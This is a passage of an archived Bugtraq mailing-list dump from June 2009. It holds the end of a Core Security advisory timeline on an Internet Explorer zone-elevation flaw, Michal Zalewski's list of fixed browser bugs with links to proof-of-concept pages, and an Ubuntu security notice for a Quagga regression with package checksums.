local file loaded through a redirection and thus defaulting to text/html
that is not explicitly known by the HTML engine (Trident) and for which
IE would end up defaulting to html as hinted. The mention of specific
files during the conference call was just as an example of a potential
vector but not a confirmed exploitation method that was explicitly
discussed.
Core also notifies the advisory publication will be delayed at least
until next Wednesday (April 28th) since it appears that the bug was not
actually fixed properly in IE8 and that new information has been provided.
. 2009-04-23:
Core also suggests some mitigation actions to prevent the exploitation
of this flaw. For example, by explicitly constraining 'file://127.0.0.1'
to a given zone (i.e. Intranet) and then disabling "Websites in less
privileged web content zone can navigate into this zone" for that zone.
. 2009-04-24:
MSRC notifies that it would be possible to bypass the suggested
workaround if a malicious site had its domain name resolve to 127.0.0.1
since Zone determination does not depend on name resolution.
. 2009-04-24:
Core suggests other possible workarounds that involve explicitly setting
the two UNC forms of targeting the localhost IP addressing the Internet
Zone and setting the security level to High which seems to be in line
with the suggestions from Microsoft's knowledgebase article about the IE
Enhanced Security Configuration and asks for additional technical
details to clarify the last email from MSRC. Core asks for clarification
about the zone determination algorithm.
. 2009-04-24:
MSRC provides further technical analysis, and notifies that some of the
proposed workarounds would work on all affected versions of IE.
. 2009-04-28:
The vendor asks to re-schedule the advisory publication date for a
coordinated release during the regular June bulletin release cycle.
. 2009-05-04:
Core responds that it decided to set the publication date for the
security advisory to Tuesday June 9th, 2009. This will give MSFT the
opportunity to ship an official patch for all vulnerable versions of IE
in the next available patch release cycle. Core also notifies this date
is final and that in absence of an official fix Core will nonetheless
publish the security advisory with all the technical details and
information necessary for third parties to understand the risk and
figure out and apply workarounds or mitigating measures.
. 2009-05-06:
MSRC indicates that it would like to set up a conference call to clarify
the concerns about workarounds and to discuss additional possible
mitigation actions.
. 2009-05-26:
Core ask for the status of the fix and whether it is on schedule for the
June 9th release, responds that it prefers to keep the communication
process properly documented by e-mail but notifies that a conference
call would be possible if the vendor feels that it is absolutely
necessary or the best way to discuss workarounds and mitigation actions.
. 2009-05-28:
MSRC notifies the fix for the issue submitted in October 2008 is on
track to be released on the second Tuesday in June 2009. Vendor is still
determining the best way to address the additional PoC provided for IE8,
and MSRC asks for a conference call to clarify some confusion of the
proposed workarounds and mitigations.
. 2009-06-01:
Core notifies the possible timeslot for setting up a conference call
with MSRT would be June 2nd or June 4th. Core also asks if the vendor is
considering the second PoC as a separate vulnerabilities or just
variations on how to exploit the same bug.
. 2009-06-01:
MSRC suggests setting up the conference call on June 4th. The vendor
also notifies that during the investigation of the 2nd PoC, when
debugged, the system actions are controlled by different functions and
the difference is significant enough to address the 2nd PoC as a whole.
. 2009-06-02:
Core responds it would be available for a conference on June 4th.
Conference call set scheduled.
. 2009-06-04:
Conference call attended by MSRC, IE team member, Core security
advisories team and vulnerability researchers.
. 2009-06-04:
Core sends MSRC notes taken during the conference call. Actions items:
. MSRC to provide workaround and mitigations and to follow-up on
issues demonstrated by the second PoC.
. Core to further investigate workarounds and mitigations and to
provide MSRC the final draft of the advisory before publication (by
Monday).
. 2009-06-04:
MSRC sends notes of the conference call. Official workarounds and
mitigating factors to be included in the Security Bulletin and link the
Security Research and Defense blog with additional information.
. 2009-06-04:
Core suggests the use of the Protocol Lockdown feature control as
possible workaround.
. 2009-06-05:
MSRC confirms that Protocol Lockdown is a feasible workaround. Details
will be included in the Security Research and Defense blog.
. 2009-06-09:
Final draft of the advisory sent to MSRC.
. 2009-06-09:
Core Security Advisory CORE-2008-0826 published.
10. *References*
[1]
http://www.techzoom.net/publications/insecurity-iceberg/index.en
[2]
http://msdn2.microsoft.com/en-us/library/ms537183.aspx.
[3]
http://blogs.technet.com/srd/archive/2009/06/09/cve-2009-1140-benefits-of-ie-protected-mode-additional-network-protocol-lockdown-workaround.aspx
[4]
http://msdn.microsoft.com/en-us/library/ms775147(VS.85).aspx
[5]
http://msdn.microsoft.com/en-us/library/ms775107(VS.85).aspx
[6]
http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx.
[7] Internet Explorer 8.0 was officially released at this time leaving
the 'beta stage'.
http://www.microsoft.com/windows/internet-explorer/default.aspx.
[8]
http://www.coresecurity.com/content/internet-explorer-zone-elevation
[9] Compatibility View KB968220 -
http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID�8753cc-2882-400c-a45d-587c870b8c0d
and
http://support.microsoft.com/?kbid�8220.
[10] SPAD link -
http://support.microsoft.com/kb/969058.
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla -
http://enigmail.mozdev.org
iD8DBQFKLtOEyNibggitWa0RAvvyAKCI46nwvU9vnduhVXILQxTdjDvS5QCfeT4Z
VVaWDRlQgd4vAFGQO+I4HW0=KI4M
-----END PGP SIGNATURE-----
From - Wed Jun 10 11:07:21 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000824b
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40599-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8EFABEDA9A
for <lists@securityspace.com>; Wed, 10 Jun 2009 10:57:30 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 502AC237199; Wed, 10 Jun 2009 08:31:40 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14569 invoked from network); 9 Jun 2009 22:00:18 -0000
MIME-Version: 1.0
Date: Tue, 9 Jun 2009 15:01:44 -0700
Message-ID: <448e9a320906091501u71efc645v4efc79f9bcf0ef98@mail.gmail.com>
Subject: catching up on several recently fixed bugs of note
From: Michal Zalewski <lcamtuf@coredump.cx>
To: bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:
Hi all,
I am way behind on this, so I wanted to drop a quick note regarding
some of my vulnerabilities recently addressed by browser vendors - and
provide some possibly interesting PoCs / fuzzers to go with them:
Summary : MSIE same-origin bypass race condition (CVE-2007-3091)
Impact : security bypass, possibly more
Reported : June 2007 (publicly)
PoC URL :
http://lcamtuf.coredump.cx/ierace/
Bulletin :
http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx
Notes : additional credit to David Bloom for developing an improved
proof-of-concept exploit
Summary : MSIE memory corruption on page transitions
Impact : memory corruption, potential code execution
Reported : April 2008 (privately)
PoC URL :
http://lcamtuf.coredump.cx/stest/ (fuzzers)
Bulletin :
http://www.microsoft.com/technet/security/Bulletin/MS09-014.mspx
Notes : -
Summary : multiple browsers <CANVAS> implementation crashes
(CVE-2008-2321, ???)
Impact : memory corruption, potential code execution
Reported : February 2008 (privately)
PoC URL :
http://lcamtuf.coredump.cx/canvas/ (fuzzer)
Bulletin :
http://lists.apple.com/archives/security-announce/2009/Jun/msg00002.html
Bulletin :
http://www.opera.com/support/kb/view/882/
Notes : also some DoS issues in Firefox
Summary : Safari page transition tailgating (CVE-2009-1684)
Impact : page spoofing, navigation target disclosure
Reported : February 2008 (privately)
PoC URL :
http://lcamtuf.coredump.cx/sftrap2/
Bulletin :
http://lists.apple.com/archives/security-announce/2009/Jun/msg00002.html
Notes : -
Cheers,
/mz
From - Wed Jun 10 11:07:23 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000824d
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40600-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3B070ED8E2
for <lists@securityspace.com>; Wed, 10 Jun 2009 11:06:15 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 7F8F82371E0; Wed, 10 Jun 2009 08:31:55 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17091 invoked from network); 10 Jun 2009 00:35:11 -0000
Date: Tue, 9 Jun 2009 17:36:32 -0700
From: Kees Cook <kees@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-775-2] Quagga regression
Message-ID: <20090610003632.GF7749@outflux.net>
Reply-To: Ubuntu Security <security@ubuntu.com>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="T4sUOijqQbZv57TR"
Content-Disposition: inline
Organization: Ubuntu
X-MIMEDefang-Filter: outflux$Revision: 1.316 $
X-HELO: www.outflux.net
X-Scanned-By: MIMEDefang 2.64 on 10.2.0.1
Status:
--T4sUOijqQbZv57TR
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
==========================================================Ubuntu Security Notice USN-775-2 June 09, 2009
quagga regression
https://launchpad.net/bugs/384193
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
quagga 0.99.2-1ubuntu3.6
Ubuntu 8.04 LTS:
quagga 0.99.9-2ubuntu1.3
Ubuntu 8.10:
quagga 0.99.9-6ubuntu0.2
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
USN-775-1 fixed vulnerabilities in Quagga. The preventative fixes
introduced in Quagga prior to Ubuntu 9.04 could result in BGP service
failures. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
It was discovered that the BGP service in Quagga did not correctly
handle certain AS paths containing 4-byte ASNs. An authenticated remote
attacker could exploit this flaw to cause bgpd to abort, leading to a
denial of service.
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6.diff.gz
Size/MD5: 33723 68d422d6bc1144c884c8d3464b2d7132
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6.dsc
Size/MD5: 808 f99f295766118d53be45a1186c2c0a98
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2.orig.tar.gz
Size/MD5: 2185137 88087d90697fcf5fe192352634f340b3
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.2-1ubuntu3.6_all.deb
Size/MD5: 664150 cdb4f6e8bd79bd87efb0e0c083ea5102
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6_amd64.deb
Size/MD5: 1404194 f771faa047cb099f9c2413e9f06a9228
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6_i386.deb
Size/MD5: 1199178 8c288bcee96507962ffb0b95e26cc77c
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6_powerpc.deb
Size/MD5: 1351356 8803c7a2df4bdc196a8746199badd6c7
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.6_sparc.deb
Size/MD5: 1322370 0412d82e928f89a739287456b43f355a
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3.diff.gz
Size/MD5: 35961 52f3b6d3d31515936f582dea2ff81322
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3.dsc
Size/MD5: 1022 d4a0caac214e93c40cb73c5066dca423
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9.orig.tar.gz
Size/MD5: 2341067 4dbdaf91bf6609803819d97d5fccc4c9
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.9-2ubuntu1.3_all.deb
Size/MD5: 661722 a301f125c189a5147022712c7beb043d
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_amd64.deb
Size/MD5: 1619806 e455a7297029d4041f67e88ba20e3c04
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_i386.deb
Size/MD5: 1464714 0dbc4715b946e5acf8ce082cc7e4d84c
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_lpia.deb
Size/MD5: 1461224 de1ec96b620619222ddb8f14a62a2b2c
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_powerpc.deb
Size/MD5: 1658750 10e87db24545fd262e9ab09c454dbcb3
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.3_sparc.deb
Size/MD5: 1521338 da17c3904269a1c02f44c885ea11910e
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-6ubuntu0.2.diff.gz
Size/MD5: 35942 c398f6251074d10961f61146438ca43b
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-6ubuntu0.2.dsc
Size/MD5: 1486 69e9c33ac728149c88a14e9ec3aa3d19
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9.orig.tar.gz
Size/MD5: 2341067 4dbdaf91bf6609803819d97d5fccc4c9
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.9-6ubuntu0.2_all.deb
Size/MD5: 661184 fbe795b23f63d7b3829af6e380851898
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-6ubuntu0.2_amd64.deb
Size/MD5: 1729234 ece98a59fe978b3fa745f243f474203b
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-6ubuntu0.2_i386.deb
Size/MD5: 1589744 7b785351949cc9fae156ecaa9de01a16
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-6ubuntu0.2_lpia.deb
Size/MD5: 1565198 17ae197e27cfa117aa8138d51966021d
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-6ubuntu0.2_powerpc.deb
Size/MD5: 1693920 71d67e45e19c379b5ab7068428425c87
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-6ubuntu0.2_sparc.deb
Size/MD5: 1643486 439ea98447af83e3f8be1b1fb7420190
